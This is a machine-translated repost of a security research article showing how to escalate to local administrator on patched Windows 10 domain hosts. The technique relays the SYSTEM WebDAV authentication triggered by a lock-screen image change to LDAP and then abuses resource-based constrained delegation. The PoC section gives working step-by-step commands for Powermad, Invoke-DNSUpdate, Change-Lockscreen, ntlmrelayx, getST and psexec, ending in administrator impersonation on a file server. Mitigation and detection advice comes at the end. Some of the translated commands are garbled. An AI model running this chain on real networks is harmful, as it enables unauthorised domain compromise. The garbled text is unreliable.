Shulou(Shulou.com)06/02 Report--

This article shows you how to bypass the graphical interface dependency on the patch-filled Win10 domain host to achieve local rights. The content is concise and easy to understand, which will definitely brighten your eyes. I hope you can get something through the detailed introduction of this article.

Objective

The purpose of the editor is to show you how to bypass the graphical interface dependency to achieve local rights on patch-filled Win10 domain hosts. You may have noticed that this attack is not new, but we have removed some of its dependencies, and we have automated the process to simplify our operation.

Attack condition

As of this writing, attackers still need to meet the following conditions before they can use this technology to compromise Active Directory computer objects:

An account with at least one ServicePrincipalName (SPN). This account will be configured to "allow to represent other identities (Allowed To Act On Behalf Of Other Identity)" on the victim's system and will be used to invoke the S4U2self and S4U2proxy protocols.

The WebDAV Redirector feature must be installed on the victim computer. This is because the WebDAV client does not negotiate signatures, thus allowing authentication to relay to the LDAP.

SMB relays can be implemented around using the recently discovered signing/MIC NTLM, but this has been fixed by Microsoft. [6] [7]

Points to the DNS record of the attacker's computer. The WebDAV client will automatically authenticate only to hosts in the Intranet zone. This means that using IP instead of hostnames doesn't work.

Access GUI to use the "Create your picture-- > Browse for one" function. One of the steps is done by System (therefore, the computer account is on the network), and the WebDAV path can be specified (\\ maliciousWebDav@80\ pics\ pic.jpg)

The following information is useful in trying to meet the above dependencies:

1. The default Active Directory ms-DS-MachineAccountQuota attribute allows all domain users to add up to 10 computer accounts to the domain [4]. In addition, the computer account has the value of its SPN property, so the S4U protocol is allowed.

two。 On Windows 10, the WebDAV client is installed by default. In Windows Server 2012R2 and earlier versions, desktop experience functionality (Desktop Experience feature) is required. On Windows Server 2016 and later, the WebDAV Redirector feature must be installed manually.

3. By default, authenticated users have a create all Child objects ACL in the Active Directory Integration DNS (ADIDNS) area. This creates a new DNS record.

The first three conditions are easy to meet because they represent the default Active Directory and Windows configurations. However, GUI's dependency is a frustrating limitation in our scenario.

Change the image from the command line

As the first approach, we looked at using the API or Windows command utility to change the profile image-but without success. However, we found that the same attack path can be exposed through the operation of locking the screen image.

The screenshot below illustrates this.

Note: a few days before this article, Elad Shamir published an article saying that he also discovered this lock screen image attack path. Research on him can be found in [12].

When studying the lock screen image function, we found that in this example, we can use API to perform lock screen image changes [3]. Using this API, we finally implemented SYSTEM network authentication from the command line.

Write PowerShell scripts and C # assemblies to take advantage of this API. We called the utility Change-Lockscreen, which can be found in the following link:

Https://github.com/nccgroup/Change-Lockscreen

Use this tool to indicate the path to the WebDAV that provides the image, and the Change-Lockscreen will perform the actions that lead to the required network authentication.

Note that by default, Windows 10 has a feature called Windows Spotlight. This feature automatically downloads and displays the lock screen image. When this feature is enabled, Change-Lockscreen disables it and creates the image specified in the parameter (try using opsec). However, if the user sets a static, custom lock screen image instead of using Spotlight, Change-Lockscreen will back up the image and put it back in place after the attack is complete.

Demo video: implementing an attack in Impacket

Initially, we used the rbcd_relay.py delegated relay tool developed by 3xocyte (in collaboration with Elad Shamir) [5]. While this is useful in some of our test scenarios, it doesn't cover everything we need. Therefore, we decided to add our own content to 3xcely's work and SecureAuth's Impacket project [13] by executing the pull request.

We added a new flag to ntlmrelayx called-- serve-image. Using this flag, ntlmrelayx will provide the specified image to meet the purpose of the attack.

In addition, in order to take advantage of the server capabilities of WebDAV, it is necessary to implement OPTIONS and PROPFIND methods in httprelayserver.py. The OPTIONS method is used to notify the client that the PROPFIND method is supported and enabled. It is an PROPFIND request, which includes NTLM authentication, so this request will be relayed to perform the attack (the example request is shown in the figure below).

The example usage is as follows:

Ntlmrelayx.py-t ldap://dc01.capsule.corp-delegate-access-escalate-user machine$-serve-image. / spot.jpg

These features have been merged in Impacket and can be found in the following locations:

Https://github.com/SecureAuthCorp/impacket

PoC

The following is a video demonstration of using Change-Lockscreen and ntlmrelayx attacks:

The following steps correspond to the above video content:

1. We need an account with the value of the ServicePrincipalName attribute to call S4U2Self and S4U2Proxy. We can abuse the default Active Directory ms-DS-MachineAccountQuota property to add the computer account to the domain and use it (Powermad [11]).

$pass = ConvertTo-SecureString 'NCC12344th'-AsPlainText-Force; New-MachineAccount-MachineAccount s4umachine-Password $pass

two。 We must create a DNS record (ImageServer.capsule.corp) that points to the attacker's machine (attacker IP).

$cred = New-Object System.Management.Automation.PSCredential ("CAPSULE\ s4umachine", $pass); Invoke-DNSUpdate-DNSType A-DNSName ImageServer.capsule.corp-DNSData 10.10.11.137-Credential $cred-Realm capsule.corp

3. We trigger Fileserver's network authentication by using the low-priv user to change the lock screen image.

Change-Lockscreen-Webdav\\ imageserver@80\

4. With ntlmrelayx, authentication is relayed to LDAP. This allows us to modify the msDS-AllowedToActOnBehalfOfOtherIdentity property of the machine.

Ntlmrelayx.py-t ldap://dc01.capsule.corp-- delegate-access-- escalate-user s4umachine$-- serve-image. / spot.jpg

5. Now we can use a trusted computer (S4UMachine$) to impersonate any user of any service on the file server.

GetST.py capsule\ s4umachineParticipationNCC1234The fileserver.roome.corp-spn cifs/fileserver.capsule.corp-impersonate administrator-dc-ip 10.10.11.128Export KRB5CCNAME=administrator.ccachePsexec.py-k-no-pass fileserver.capsule.corp

The following short video shows you the steps involved in the attack in a graphical and conceptual way.

Mitigation and detection

The following points can help mitigate and detect such attacks:

Since this attack relies on a computer that can configure constraint delegation based on Kerberos resources for itself, denying a new ACE on a computer that writes the msDS-AllowedToActOnBehalfOfOtherIdentity property itself will help mitigate this attack surface.

For the msDS-AllowedToActOnBehalfOfOtherIdentity attribute, implementing the appropriate SACL will help detect changes to this feature.

Finally, enabling LDAP signing through channel binding can mitigate authentication relays performed using this attack.

The above is how to bypass the graphical interface dependency to achieve local rights on patch-filled Win10 domain hosts. Have you learned any knowledge or skills? If you want to learn more skills or enrich your knowledge reserve, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.